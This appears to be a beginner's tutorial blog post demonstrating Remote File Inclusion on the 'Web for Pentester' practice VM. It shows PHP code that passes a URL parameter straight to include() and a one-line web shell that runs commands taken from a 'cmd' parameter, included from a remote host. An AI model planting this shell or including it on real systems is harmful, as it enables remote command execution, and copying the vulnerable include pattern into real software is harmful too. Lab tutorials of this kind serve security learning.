Remote File Inclusion or RFI is a vulnerability occurs in web applications.

We use a Linux distribution called "Web for pen testers". You can download it from hear. Now boot the virtual mashing. You'll see a screen like this.

Yes it is a Debian based OS with lot of examples that demonstrate common vulnerabilities like Command injection, SQL injection , Cross Site Scripting etc. Apache server and MySQL are per-installed on this mashing.

Now use you web browser to browse the IP that we discovered in last step. You can see following web interface. Wow there are many vulnerabilities to explorer.There are more to practice with this VM.

In this tutorial we are going to focus on Remote file inclusion. So let's select example1 of File include category.

In the URL you can see a parameter like following.

example1.php?page=intro.php

Now think what it does? when example1.php is loaded intro.php will be automatically included and what ever in that file will be executed. Now. let's see what actually happens inside the hood.

hear you can see the source code of example1.php

<?php require_once '../header.php'; ?>


<?php

        if ($_GET["page"]) {
                include($_GET["page"]);

        }



?>

<?php require_once '../footer.php'; ?>

There are something to notice. Did you see 2  statements called include. and require_once . Both of them are used to insert another php script into current file.

require method give an error when given file is not exist. So current script stops executing.

include method give a warning  and the rest of the script will be continued.

Now in above example1.php they have used include($_GET["page"])); .

In several places I  have explained about  $_GET[]. Do you remember what it does?It will fetch the URL parameter called page and put it on the include function.

Now what if we  can include  a PHP web shell  using this method?  What we have to do is upload the shell to a server and input shell's url as the page parameter. I hope you got a clear idea on RFI. Let's see how we can do this practically.

In above SS I logged into VM and looked for files. Actually this step is not needed. Let's create a dummy php file for testing purpose.

Now I host that file on another VM and give the dummy file's URL as the input. Let's see what happen.

Wow it is working .

Now let's build actual php shell. In a previous tutorial I explained you how to build a quick web shell.

<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>' ; ?>

Hear you can see the final result.

 

I hope you enjoyed the tutorial. Leave a comment if you need any tutorials on these topics. I'll try my maximum to write a post. :-)